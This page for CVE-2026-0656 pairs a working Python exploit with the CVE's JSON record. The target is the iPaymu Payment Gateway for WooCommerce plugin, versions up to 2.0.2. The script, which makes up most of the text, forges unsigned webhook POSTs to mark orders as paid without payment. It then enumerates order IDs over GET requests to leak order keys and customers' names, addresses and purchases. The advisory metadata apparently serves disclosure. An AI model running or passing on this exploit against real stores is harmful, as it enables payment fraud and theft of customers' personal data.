CVE-2026-0656

import requests # CVE-2026-0656 PoC - iPaymu Payment Gateway Auth Bypass # Target: WordPress site with iPaymu WooCommerce plugin <= 2.0.2 TARGET_URL = "https://vulnerable-site.com/" def mark_order_as_paid(order_id): """Mark WooCommerce order as paid without actual payment""" webhook_url = f"{TARGET_URL}?wc-api=check_ipaymu_response" # Crafted POST request without signature verification payload = { 'status': 'success', 'trx_id': 'FAKE_TRX_12345', 'order_id': str(order_id), 'amount': '100000', 'product': f'Order #{order_id}' } response = requests.post(webhook_url, data=payload, timeout=10) print(f"[*] Sent forged payment notification for order {order_id}") print(f"[*] Response status: {response.status_code}") return response def enumerate_orders(start_id=1, end_id=1000): """Enumerate order IDs and leak order keys via GET requests""" print(f"[*] Enumerating orders from {start_id} to {end_id}...") for order_id in range(start_id, end_id + 1): # Direct access to order info without authentication order_url = f"{TARGET_URL}?wc-api=check_ipaymu_response&order_id={order_id}" response = requests.get(order_url, timeout=10) if response.status_code == 200 and 'order_key' in response.text: print(f"[+] Found valid order: {order_id}") print(f"[+] Order details: {response.text[:200]}...") # Execute attack if __name__ == "__main__": # Step 1: Mark a specific order as paid mark_order_as_paid(1001) # Step 2: Enumerate orders to find valid ones enumerate_orders(1000, 2000)

{"cve": {"id": "CVE-2026-0656", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:07.867", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The iPaymu Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Missing Authentication in all versions up to, and including, 2.0.2 via the 'check_ipaymu_response' function. This is due to the plugin not validating webhook request authenticity through signature verification or origin checks. This makes it possible for unauthenticated attackers to mark WooCommerce orders as paid by sending crafted POST requests to the webhook endpoint without any payment occurring, as well as enumerate order IDs and obtain valid order keys via GET requests, exposing customer order PII including names, addresses, and purchased products."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ipaymu-for-woocommerce/tags/2.0.2/gateway.php?marks=316-336,370-380#L316", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429657%40ipaymu-for-woocommerce&new=3429657%40ipaymu-for-woocommerce", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7e639aed-ec67-4212-9051-1f7465bbfde2?source=cve", "source": "[email protected]"}]}}